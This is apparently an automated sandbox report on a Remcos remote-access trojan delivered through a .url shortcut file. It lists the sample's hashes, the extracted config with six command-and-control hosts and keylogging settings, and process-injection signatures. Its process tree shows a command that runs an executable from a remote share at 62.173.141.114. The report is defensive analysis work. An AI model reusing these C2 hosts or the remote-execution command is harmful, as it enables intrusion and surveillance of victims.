Analysis
- max time kernel: 150s
- max time network: 155s
- platform: windows10-2004_x64
- resource: win10v2004-20231023-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231023-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 23-11-2023 11:56
Static task: static1
Behavioral task: behavioral1
- Sample: Order_Information.url
- Resource: win7-20231023-en
Behavioral task: behavioral2
- Sample: Order_Information.url
- Resource: win10v2004-20231023-en
General
- Target: Order_Information.url
- Size: 201B
- MD5: 73461871b344c75f77323047fbafd617
- SHA1: 2a7860291499b27b133fe538f792173d7fc93de2
- SHA256: dbd04333b7af300fbe8f6843866881403b48711d6380102109dabfdad6ad0251
- SHA512: 275bc9b94ebb8797c08a75bd4f0cebd7d8bf143d73d649df612fb4c2eeae9b6ea764f4871da9fa097f0b3e74d706e4c3e8b2e80ecaf94cdfefc6f0d9be8ea2cc
Malware Config
Extracted: remcos
- RemoteHost:
  listpoints.online:6090
  retghrtgwtrgtg.bounceme.net:3839
  listpoints.click:7020
  datastream.myvnc.com:5225
  gservicese.com:2718
  center.onthewifi.com:8118
- audio_folder: MicRecords
- audio_record_time: 5
- connect_delay: 0
- connect_interval: 1
- copy_file: explorer.exe
- delete_file: false
- hide_file: true
- hide_keylog_file: false
- install_flag: false
- keylog_crypt: false
- keylog_file: logs.dat
- keylog_flag: false
- keylog_folder: remcos
- mouse_option: false
- mutex: Rmc-BXAQVH
- screenshot_crypt: false
- screenshot_flag: false
- screenshot_folder: Screenshots
- screenshot_path: %AppData%
- screenshot_time: 10
- take_screenshot_option: false
- take_screenshot_time: 5
Signatures
- Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  Processes:
    description             pid   process            target process
    PID 1564 created 376    1564  InvoicePayPal.exe  rundll32.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes:
    description: Key value queried
    ioc: \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation
    process: rundll32.exe
- Executes dropped EXE (1 IoC)
  Processes:
    pid   process
    3316  WebCopier.exe
- Loads dropped DLL (1 IoC)
  Processes:
    pid   process
    3316  WebCopier.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes:
    description                           pid   process        target process
    PID 3316 set thread context of 404    3316  WebCopier.exe  cmd.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  Processes:
    pid   process            events
    1564  InvoicePayPal.exe  2
    3316  WebCopier.exe      2
    404   cmd.exe            2
- Suspicious behavior: MapViewOfSection (2 IoCs)
  Processes:
    pid   process
    3316  WebCopier.exe
    404   cmd.exe
- Suspicious use of SetWindowsHookEx (2 IoCs)
  Processes:
    pid   process            events
    1564  InvoicePayPal.exe  2
- Suspicious use of WriteProcessMemory (14 IoCs)
  Processes:
    description                         pid   process            target process     events
    PID 376 wrote to memory of 1564     376   rundll32.exe       InvoicePayPal.exe  3
    PID 1564 wrote to memory of 3316    1564  InvoicePayPal.exe  WebCopier.exe      3
    PID 3316 wrote to memory of 404     3316  WebCopier.exe      cmd.exe            4
    PID 404 wrote to memory of 2248     404   cmd.exe            explorer.exe       4
Processes (tree; depth as reported, PIDs taken from the signature tables)
- C:\Windows\System32\rundll32.exe (PID 376, depth 1)
  Command line: "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Order_Information.url
  Signatures:
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  - \??\UNC\62.173.141.114\scarica\InvoicePayPal.exe (PID 1564, depth 2)
    Command line: "\\62.173.141.114\scarica\InvoicePayPal.exe"
    Signatures:
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

  - C:\Users\Admin\AppData\Roaming\javahost_v5\WebCopier.exe (PID 3316, depth 2)
    Command line: C:\Users\Admin\AppData\Roaming\javahost_v5\WebCopier.exe
    Signatures:
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory

    - C:\Windows\SysWOW64\cmd.exe (PID 404, depth 3)
      Command line: C:\Windows\SysWOW64\cmd.exe
      Signatures:
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of WriteProcessMemory

      - C:\Windows\SysWOW64\explorer.exe (PID 2248, depth 4)
        Command line: C:\Windows\SysWOW64\explorer.exe
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\Local\Temp\1d3e527a
  Filesize: 1.1MB
  MD5: 5f7b6e3acb1c144109ae7b2148a6b344
  SHA1: 2e14fc41a868bef4c59294ef6dfc01c8341bb269
  SHA256: 10cd679f0adcc3103979dcf7e036589fc174ca832cd5d8967b06b832c7aec671
  SHA512: 27615c81e9c8270d4701599004b0bcad57007a199db5d4e9ce41e5f4f92164e8c81c4c8ba412e9c2091a1c4bfd94664b9cf72a4e47cf95e98fdcd90af949efa7
- C:\Users\Admin\AppData\Roaming\javahost_v5\WCUtil.dll
  Filesize: 180KB
  MD5: fc081646850c1abf5d78706a6de6d639
  SHA1: 47bbf2399cb6cca6f129443fdd2b12265e3912ec
  SHA256: 05f89f7a7c06db98e3e2c89ca63d0d88f89bb4c18bcc5032ed63d1e2c1619fdb
  SHA512: a79dbd417715fad354647aa667935b13e55130edfbce6a957682889a4142acd79abc835a7d1cd0f6671f83b47f007af54ee601d4431d6f64cfbef5b4363402fa
- C:\Users\Admin\AppData\Roaming\javahost_v5\WebCopier.exe
  Filesize: 7.2MB
  MD5: e2a27870ba4da90df6276c4da9e3cf82
  SHA1: cd0a17f6ddc7b4994d98f26848c3a2d7dae74e68
  SHA256: 9f1bb79ef7d76e5dddc628d0455c1f6a6aa068cc210f1d238a231f77ac9cbba2
  SHA512: 66c4d8d1c6cb45a6c10cbb16d4388858980e7bc4f57fb88dc2a3b7b8fc6da82dba3e9b1bfd33ea4c25a7afd5612c2823915e5f0759728cccfe81bd4f99afc235
- C:\Users\Admin\AppData\Roaming\javahost_v5\paralanguage.xlsx
  Filesize: 925KB
  MD5: 4441c3a6efda6fe8a91638fab65b7592
  SHA1: 71fbdb1b42863a79acf37290d193053c67f8de9c
  SHA256: 798a990b2b9b7372072f2976884eebbf269aa30921643a87772d9d38fff1a39e
  SHA512: ec7d675e0854abdf10a2df09d0425959da471fd382798152945f25fb31193fb3a4481bd2f26cea4de327c8e9d725152767eaef4d8fe1d23cde1fe0dc36de54cc
- Memory dumps (27 regions, grouped by PID; process names taken from the signature tables)
  PID 404 (cmd.exe)
    memory/404-22-0x0000000074640000-0x00000000747BB000-memory.dmp   Filesize: 1.5MB
    memory/404-24-0x00007FFF610B0000-0x00007FFF612A5000-memory.dmp   Filesize: 2.0MB
    memory/404-26-0x0000000074640000-0x00000000747BB000-memory.dmp   Filesize: 1.5MB
    memory/404-27-0x0000000074640000-0x00000000747BB000-memory.dmp   Filesize: 1.5MB
    memory/404-29-0x0000000074640000-0x00000000747BB000-memory.dmp   Filesize: 1.5MB
  PID 1564 (InvoicePayPal.exe)
    memory/1564-0-0x0000000000400000-0x0000000000C1A000-memory.dmp   Filesize: 8.1MB
    memory/1564-1-0x0000000074640000-0x00000000747BB000-memory.dmp   Filesize: 1.5MB
    memory/1564-2-0x00007FFF610B0000-0x00007FFF612A5000-memory.dmp   Filesize: 2.0MB
    memory/1564-4-0x0000000074640000-0x00000000747BB000-memory.dmp   Filesize: 1.5MB
    memory/1564-9-0x0000000074640000-0x00000000747BB000-memory.dmp   Filesize: 1.5MB
    memory/1564-19-0x0000000074640000-0x00000000747BB000-memory.dmp  Filesize: 1.5MB
  PID 2248 (explorer.exe)
    memory/2248-30-0x00007FFF610B0000-0x00007FFF612A5000-memory.dmp  Filesize: 2.0MB
    memory/2248-31-0x0000000000470000-0x00000000004F4000-memory.dmp  Filesize: 528KB
    memory/2248-34-0x0000000000BB0000-0x0000000000FE3000-memory.dmp  Filesize: 4.2MB
    memory/2248-35-0x0000000000470000-0x00000000004F4000-memory.dmp  Filesize: 528KB
    memory/2248-36-0x0000000000470000-0x00000000004F4000-memory.dmp  Filesize: 528KB
    memory/2248-37-0x0000000000470000-0x00000000004F4000-memory.dmp  Filesize: 528KB
    memory/2248-38-0x0000000000470000-0x00000000004F4000-memory.dmp  Filesize: 528KB
    memory/2248-39-0x0000000000470000-0x00000000004F4000-memory.dmp  Filesize: 528KB
    memory/2248-40-0x0000000000470000-0x00000000004F4000-memory.dmp  Filesize: 528KB
    memory/2248-41-0x0000000000470000-0x00000000004F4000-memory.dmp  Filesize: 528KB
    memory/2248-42-0x0000000000470000-0x00000000004F4000-memory.dmp  Filesize: 528KB
    memory/2248-43-0x0000000000470000-0x00000000004F4000-memory.dmp  Filesize: 528KB
  PID 3316 (WebCopier.exe)
    memory/3316-16-0x0000000074640000-0x00000000747BB000-memory.dmp  Filesize: 1.5MB
    memory/3316-17-0x00007FFF610B0000-0x00007FFF612A5000-memory.dmp  Filesize: 2.0MB
    memory/3316-18-0x0000000074640000-0x00000000747BB000-memory.dmp  Filesize: 1.5MB
    memory/3316-20-0x0000000074640000-0x00000000747BB000-memory.dmp  Filesize: 1.5MB